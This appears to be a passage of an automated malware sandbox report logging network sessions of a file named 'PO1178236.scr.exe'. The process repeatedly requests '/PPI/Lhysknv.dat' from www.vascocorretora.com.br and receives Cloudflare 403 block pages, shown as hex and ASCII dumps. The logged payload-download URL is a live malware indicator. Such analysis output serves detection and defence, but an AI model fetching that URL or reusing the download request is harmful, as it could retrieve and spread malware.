        2025-01-09 07:36:49 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:49 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 33 30 33 61 64 33 63 33 36 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2303ad3c360</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:49 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 33 30 33 61 64 33 63 33 36 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2303ad3c360',t:'MTczNjQwODIwOS4wMDAwMDA='};var
        2025-01-09 07:36:49 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        87192.168.2.949796188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:50 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:50 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:50 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:05 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t0Hk3h7R%2BrRaB1X538ZOGu9%2BoiOTYvxX9BPp7reIQ0hKgXTMTRaEGQgJ1a1xwjz4CgddtvHCEh17eEkOFeW5eT6oUiSUsu4WUG4IPeMgWa95Z48cYMVCm%2FUEI0bJQ4riikZMK9VOvxBHIaDI"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c233f9604308-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=1723&rtt_var=850&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1694718&cwnd=228&unsent_bytes=0&cid=23db61d67e8433e7&ts=134&x=0"
        2025-01-09 07:36:50 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:50 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:50 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:50 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 33 33 66 39 36 30 34 33 30 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c233f9604308</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:50 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 33 33 66 39 36 30 34 33 30 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c233f9604308',t:'MTczNjQwODIxMC4wMDAwMDA='};var a
        2025-01-09 07:36:50 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        88192.168.2.949797188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:51 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:51 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:51 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:06 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okupo7I2XTbEyuARyz0SIkHUIQvA2NdK82kdf955%2F2kCNeAkvhS6avR%2FwksoGpDNqwh1QV0PRN%2FkfA8umUs7xpJgkaHgCN1X%2BFTjrO4eY2HQJj5Wx%2BkVFf%2BlwXSVs6CsEpuG986%2FRrEPzZSP"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c237c981c407-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1649&rtt_var=621&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1760096&cwnd=197&unsent_bytes=0&cid=e14fe00b879c2ab2&ts=137&x=0"
        2025-01-09 07:36:51 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:51 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:51 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:51 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 33 37 63 39 38 31 63 34 30 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c237c981c407</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:51 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 33 37 63 39 38 31 63 34 30 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4d 53 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c237c981c407',t:'MTczNjQwODIxMS4wMDAwMDA=
        2025-01-09 07:36:51 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        89192.168.2.949798188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:51 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:51 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:51 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:06 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eBTflzltZ4TIIwhSMAtTfH41xxvshiU4dXjDbZnppXgKJOv9pB9AoyWe9Ui8U%2B0DTueKBckPMFPDq1J4i7DGMg%2BruYAgdQPjmxCl60Opj%2B3SMxxsKBsn%2Bto%2FYu1vcMwsGgvubQbL0uVPJNK"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c23bbef341e9-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2539&min_rtt=2538&rtt_var=954&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1145547&cwnd=249&unsent_bytes=0&cid=8a55a54663e6a20a&ts=142&x=0"
        2025-01-09 07:36:51 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:51 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:51 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:51 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 33 62 62 65 66 33 34 31 65 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 